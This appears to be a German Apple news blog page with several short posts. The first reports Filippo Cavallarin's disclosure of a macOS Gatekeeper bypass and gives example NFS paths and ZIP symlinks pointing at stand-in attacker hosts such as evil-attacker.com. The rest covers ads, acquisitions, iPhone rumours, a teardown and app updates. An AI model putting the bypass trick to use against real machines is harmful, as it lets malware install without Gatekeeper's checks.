Der Sicherheitsexperte Filippo Cavallarin sorgte über das Wochenende für Aufsehen, indem er eine Schwachstelle im Gatekeeper von macOS öffentlich machte, mit der sich diese Sicherheitsfunktion umgehen lässt. Dies gilt auch nach dem in der vergangenen Woche veröffentlichten Update auf macOS 10.14.5. Zur Erinnerung: Der Gatekeeper sorgt in macOS dafür, dass aus dem Internet heruntergeladene Software unmittelbar auf ihre Herkunft geprüft und der Nutzer evtl. entsprechend gewarnt wird, sollte diese nicht vertrauenswürdig sein.
Laut Cavallarin kann diese Maßnahme jedoch komplett umgangen werden, was vor allem daran liegt, dass der Gatekeeper auch externe Festplatten und Netzlaufwerke pauschal als sichere Herkunftsorte einstuft. Dies bedeutet im Imkehrschluss, dass Software von diesen Orten nicht noch einmal auf ihre Sicherheit hin überprüft werden. Dem Sicherheitsforscher zufolge kann ein Nutzer jedoch relativ einfach in eine Falle gelockt werden, ein manipuliertes Netzlaufwerk zu mounten, von dem dann Software installiert werden kann, ohne dass der Gatekeeper hier eingreift.
So könnte mit dem Pfad "ls /net/evil-attacker.com/sharedfolder/" beispielsweise der Inhalt des Ordners "sharedfolder" auf einem entfernten Server mit der Adresse "evil-attacker.com" per NFS gemountet werden. Zudem können auch in ZIP-Archiven symbolische Links enthalten sein, die ebenfalls eine Möglichkeit bieten, den Gatekeeper zu umgehen. So könnte ein solcher Link beispielsweise auf "Documents -> /net/evil.com/Documents" lauten, wodurch sich der Nutzer nicht mehr auf seinem lokalen Rechner befände, sondern auf dem Ordner "Documents" auf dem Server von evil.com.
Cavallarin habe nach eigener Aussage Apple über die Sicherheitslücke am 22. Februar informiert und das Unternehmen wollte sie eigentlich mit mscOS 10.14.5 in der vergangenen Woche stopfen. Da das 90 Tage Fenster für die Geheimhaltung der Lücke inzwischen verstrichen ist und Apple auch nicht mehr auf E-Mails von Cavallarin reagiert, wurde sie nun öffentlich gemacht. Das nachfolgende Video zeigt sie in Aktion:
YouTube Direktlink
Die legendäre und auch preisgekrönte Apple-Werbekampagne "I'm a Mac/I'm a PC" mit dem Duo John Hodgman (PC) und Justin Long (Mac) war in dem Zeitraum zwischen 2006 und 2009 extrem beliebt. 10 Jahre später hat sich Justin Long nun in der Serie "Couch Surfing" des People Magazine über sein Mitwirken in der Reihe geäußert, wie Entertainment Weekly berichtet. Long zufolge habe man seinerzeit knapp 300 Spots gedreht, von denen jedoch lediglich 66 jemals öffentlich gezeigt wurde. Der Rest wurde von Steve Jobs persönlich abgelehnt. Meist geschah dies bei den lustigsten Clips, da Jobs befürchtete, dass der Humor von den eigentlichen Apple-Produkten zu sehr ablenken würde. Als Beispiel nannte Long einen Clip mit Zach Galifianakis, in dem dieser einen betrunkenen Weihnachtsmann spielte.
Verglichen mit den heutigen, technisch sicherlich herausragenden Werbespots von Apple, muten die "I'm a Mac/I'm a PC"-Clips heute sicherlich ein wenig wie aus einer anderen Zeit an. Ich persönlich fand sie allerdings immer öußerst amüsant und habe mich immer über das Erscheinen eines neuen Spots gefreut. Mein persönliches Highlight aus der Reihe im Anschluss:
YouTube Direktlink
Es ist schon bemerkenswert, wie stark Apple als Technologie-Konzern im Gesundheitsmarkt mitmischt. Die Apple Watch wurde dabei in den vergangenen Jahren sukzessive von einem Mode-Accessoir zu einem Gesundheits- und Fitness-Gadget ausgebaut. Und dieser Trend dürfte sich auch in Zukunft weiter fortsetzen. Wie CNBC berichtet, hat Apple bereits im Jahr 2018 das Gesundheits-Startup Tueo Health übernommen, welches eine App entswickelt hat, mit der Eltern die Asthma-Symptome ihrer Kunder überwachen können. Hierzu verbindet sich die App mit kommerziellen Atmungssensoren, die die Symptome erfassen und analysieren. Sollten dabei vor allem während des Schlafens Unregelmäßigkeiten oder Auffälligkeiten erkannt werden, meldete die App dies an die Eltern, so dass sie im Ernstfall eingreifen können.
We use commercially available sensors to monitor asthmatic children while they sleep. Our technology leverages the data from these sensors to create a personalized baseline for each child. Alerts are automatically sent to parents when there are deviations from their child's baseline. These alerts are interactive and informative - we provide contextual information and just-in-time education and support to help them better manage their child's asthma.
Aktuell ist noch unklar, inwieweit Apple die übernommene Technologie in seine Produkte einfließen lassen wird. Es gab allerdings in den vergangenen Wochen immer mal Gerüchte, dass Apple eine Schlafüberwachung in seine Apple Watch einbauen könnte.
Im vergangenen Monat hat Apples langjährige Retail-Chefin Angela Ahrendts das Unternehmen verlassen und inzwischen bei Airbnb angeheuert. Zu ihrem Abschied gab es allerdings nicht nur lobende Worte Ahrendts Arbeit in den vergangenen fünf Jahren, sondern auch die eine oder andere kritische Stimme, die davon sprach, dass es ihr zu sehr um die Identität der Marke Apple gegangen sei, wodurch ein wenig zu sehr der Bezug zu den Kernaufgaben eines Ladengschäfts verlorengegangen sei. Teile von Ahrendts Entscheidungen sollen von ihrer Nachfolgerin Deirdre O'Brien bereits wieder revidiert werden.
In einem Interview mit Bloomberg sprach Angela Ahrendts nun über ihre Zeit bei Apple und auch über die Kritik an manchen ihrer Entscheidungen. Laut Ahrendst war es vor allem die Herausforderung, das Kundenerlebnis in den Apple Stores auf die nächste Stufe zu heben und mit ihrer Strahlkraft auch einen Einfluss auf Umgebung und die Gesellschaft zu nehmen. Vor allem das beliebte "Today at Apple" Programm nennt sie dabei als herausragendes Beispiel, wie Apple dies gelungen ist. Auch das Redesign der Stores empfindet Ahrendts als eine ihrer größten Errungenschaften. Für die kommenden vier Jahre habe Apple zudem noch mehrere herausragende Flagship-Stores in der Pipeline.
Angesprochen auf die Kritik an ihrer Arbeit entgegnet Ahrendts, dass sie diese gar nicht erst lese, da keine davon auf Fakten basiere. Jeder der Kritiker würde irgendwelche Geschichten erfinden, wenn ihnen eine Entscheidung nicht gefallen habe. Man könne es eben nicht immer jedem Recht machen, der Erfolg der aktuellen Apple Store Generation spräche hingegen für sich selbst. Aus diesem Grunde bereut Ahrendts nach eigener Aussage auch keine ihrer Entscheidungen und würde auch rückblickend nichts anders machen. Insgesamt empfindet Ahrendts ihre Mission bei Apple als erfüllt. Man habe von Anfang an einen 5-Jahresplan verfolgt, dessen Ziele allesamt erreicht wurden.
Ich habe bereits des Öfteren angemerkt, dass ich persönlich Touch ID gegenüber Face ID vorziehe. Hierzu stehe ich auch nach wie vor. Fernab davon, welche der beiden biometrischen Authentifizierungsmethoden die sicherere ist, muss Face ID aus meiner Sicht mit zu vielen Kompromissen leben. Ein Entsperren des iPhone wenn es vor einem auf dem Tisch liegt ist nicht möglich ohne es in die Hand zu nehmen. Gleiches gilt, wenn man bspw. seitlich auf dem Sofa liegt oder in verschiedenen ähnlichen Situationen. Hier ist Touch ID aus meiner Sicht deutlich flexibler. Entsprechend erfreut habe ich einen aktuellen Bericht des Barclays Analysten Blayne Curtis zur Kenntnis genommen, der auf Basis von Informationen aus Apples Zuliefererkette vermeldet, dass die 2020er iPhones möglicherweise mit einer neuen Fingerabdruck-Technologie ausgestattet sein könnten, die sich unter dem gesamten Display befindet (via MacRumors).
So berichtet Curtis, dass die iPhones des kommenden Jahres deutlich mehr Neuerungen mitbringen werden, als dies in diesem Jahr der Fall sei. Dies mutet auf den ersten Blick ein wenig ungewöhnlich an, stünde 2020 ja dem gewohnten Rhythmus folgend eigentlich ein s-Update für die iPhones an. Dennoch erwartet der Analyst hier Neurungen wie Unterstützung für 5G, eine 3D-Technologie für die rückwärtige Kamera, und eben auch eine akustische Fingerabdruck-Technologie, die zu einem "Full Screen Touch ID" führen könnte. Für mich wäre dies ein echtes Highlight.
In diesem Jahr hingegen sind für das iPhone neben dem zusätzlichen Kameraobjektiv auf der Rückseite von allen neuen Modellen keine größeren Designveränderungen zu erwarten. Die Massenproduktion soll in dem gewohnten Zeitfenster Juli bis August Fahrt aufnehmen. Offenbar werden sämtliche neuen iPhones in diesem Jahr auf 3D Touch verzichten. Stattdessen könnte Apple, wie auch schon beim iPhone XR, bei allen iPhone-Modellen Haptic Touch zum Einsatz bringen. Beim Nachfolger des iPhone XR sollen 4 GB RAM und damit 1GB mehr als beim aktuellen Modell verbaut werden.
Ein paar Zulieferer erwähnten gegenüber dem Analysten auch ein mögliches "iPhone SE 2", welches auf den internen Spezifikationen des iPhone 8 basieren soll und Anfang 2020 auf den Markt kommen könnte. Allerdings waren sich die Zuliefer hier nicht einige bezüglich ihrer Informationen zu einem solchen möglichen Gerät. Die diesjährigen iPhones sind erneut im September zu erwarten.
Es ist inzwischen schon eine liebgewonnene Tradition, dass die Reparaturspezialisten von iFixit ein neu auf den Markt gekommenes Apple-Geräte feinsäuberlich in seine Einzelteile zerlegt. So geschehen nun auch wieder beim in der vergangenen Woche erschienenen 2019er MacBook Pro. Während dabei grundsätzlich eher wenige Neuerungen zu erwarten waren, durfte man gespannt sein, was die Kollegen in Bezug auf die aktualisierte Butterfly-Tastatur herausfinden würden. Apple sprach hier lediglich von Verbesserungen, die die bis zuletzt bestehenden Probleme mit nicht reagierenden Tasten und doppelten Anschlägen in den Griff bekommen und die vor allem von einem neuen Material herrühren sollen.
Selbstverständlich hat sich iFixit besonders dieses Bauteil genauer angesehen und dabei eine kleine aber offenbar effektive Veränderung an der Silikonmembran entdeckt, die die Kontakte unter den Tasten vor Staub und Schmutz schützen sollen. Bei einer Infrarot-Analyse kam heraus, dass Apple im 2018er MacBook Pro offenbar eine Membran aus Polyacetylen verwendet hatte, während die aktuellen Modelle Polyamid, besser bekannt als Nylon verwenden. Auch die Metallkontakte unter den Tasten weisen kleinere Veränderungen auf, deren genaue Auswirkungen jedoch nicht näher eingegrenzt werden konnten.
Insgesamt vergibt iFixit auch bei der 2019er Auflage des MacBook Pro den niedrigstmöglichen Reparaturwert, da Prozessor, Arbeitsspeicher und Flash-Speicher nach wie vor direkt auf das Logicboard gelötet und die Tastatur, der Akku, die Lautsprecher und die Touch Bar miteinander verklebt sind.
Lange hatte sich Nintendo gewehrt, Smartphones als den neuen Standard für mobile Videospiele anzuerkennen und sich dementsprechend auch geweigert, die eigenen Titel unter anderem für iOS zu veröffentlichen. Diese Strategie hat sich inzwischen geändert, so dass man inzwischen beispielsweise auch Super Mario auf dem iPhone spielen kann. Inzwischen nähern wir uns auch der Veröffentlichung von Mario Kart Tour, welches auf Android bereits ersten Beta-Testern in den USA und Japan zur Verfügung gestellt wurde. Selbstverständlich haben inzwischen auch erste Gameplay-Videos ihren Weg ins Internet gefunden, auch wenn Nintendo einige davon bereits wieder entfernen ließ.
YouTube Direktlink
Bei dem Spiel wird Nintendo erneut das Freemium-Modell verfolgen, die App also kostenlos in den AppStore stellen und dann auf In-App Käufe setzen. Diese dürften den Testern zufolge allerdings offenbar relativ teuer werden. Ein konkreter Starttermin für die iOS-Version von Mario Kart Tour steht noch nicht fest, Nintendo spricht hier lediglich vom Sommer. Und damit nun viel Spaß mit den AppStore Perlen dieser Woche!
"[iOS] AppStore Perlen 21/19" vollständig lesen
Update-Time am Freitagabend. Anderthalb Wochen nach der Veröffentlichung der finalen Version von iOS 12.3 hat Apple heute Abend ein Bugfix-Update hinterhergeschoben. Den Releasenotes zufolge kümmert sich iOS 12.3.1 um ein Problem mit Telefongesprächen über VoLTE, sowie um eine Handvoll Probleme im Zusammenhang mit der Nachrichten-App. Funktionale Neuerungen sind in der Aktualisierung nicht enthalten. Sie kann wie gewohnt OTA über die Einstellungen auf dem Gerät geladen werden.